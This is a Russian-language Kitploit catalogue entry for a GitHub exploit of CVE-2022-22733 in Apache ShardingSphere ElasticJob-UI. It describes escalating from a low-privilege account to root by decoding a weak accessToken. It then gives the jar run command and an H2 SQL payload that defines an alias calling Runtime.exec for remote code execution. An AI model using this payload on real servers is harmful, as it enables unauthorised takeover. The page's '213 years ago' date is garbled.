Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-22733 — Apache ShardingSphere ElasticJob-UI — повышение привилегий и эксплуатация RCE | Kitploit
Инструменты/GitHubGitHub/zeyad-azima/cve-2022-22733
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubzeyad-azima/cve-2022-22733

CVE-2022-22733

Apache ShardingSphere ElasticJob-UI — повышение привилегий и эксплуатация RCE

Репозиторий
213 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-22733

CVE-2022-22733 — это уязвимость, затрагивающая Apache ShardingSphere ElasticJob-UI 3.0.0 и более ранние версии. Уязвимость приводит к повышению привилегий. Однако, злоупотребляя повышенными привилегиями, можно выполнить JDBC-атаку и добиться RCE. Вы можете прочитать анализ уязвимости здесь и пошаговое руководство по написанию эксплойта здесь.

elasticjob

Эксплойт работает следующим образом:

  • Вход с низкопривилегированной учётной записью.
  • Получение небезопасно сгенерированного accessToken.
  • Декодирование небезопасно сгенерированного accessToken.
  • Парсинг декодированных данных из accessToken.
  • Извлечение учётных данных учётной записи root из парсированных данных.
  • Вход с учётными данными root и получение полных привилегий в приложении.
  • Отправка запроса теста соединения с использованием JDBC-атаки.

Использование

Вы можете скачать JAR-файл отсюда и исходный код отсюда.

  • Выполните jar:
java -jar CVE-2022-22733.jar
  • Код SQL-скрипта:
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')

Демонстрация

idea64_5Ru1DeWcKE

Скачать инструмент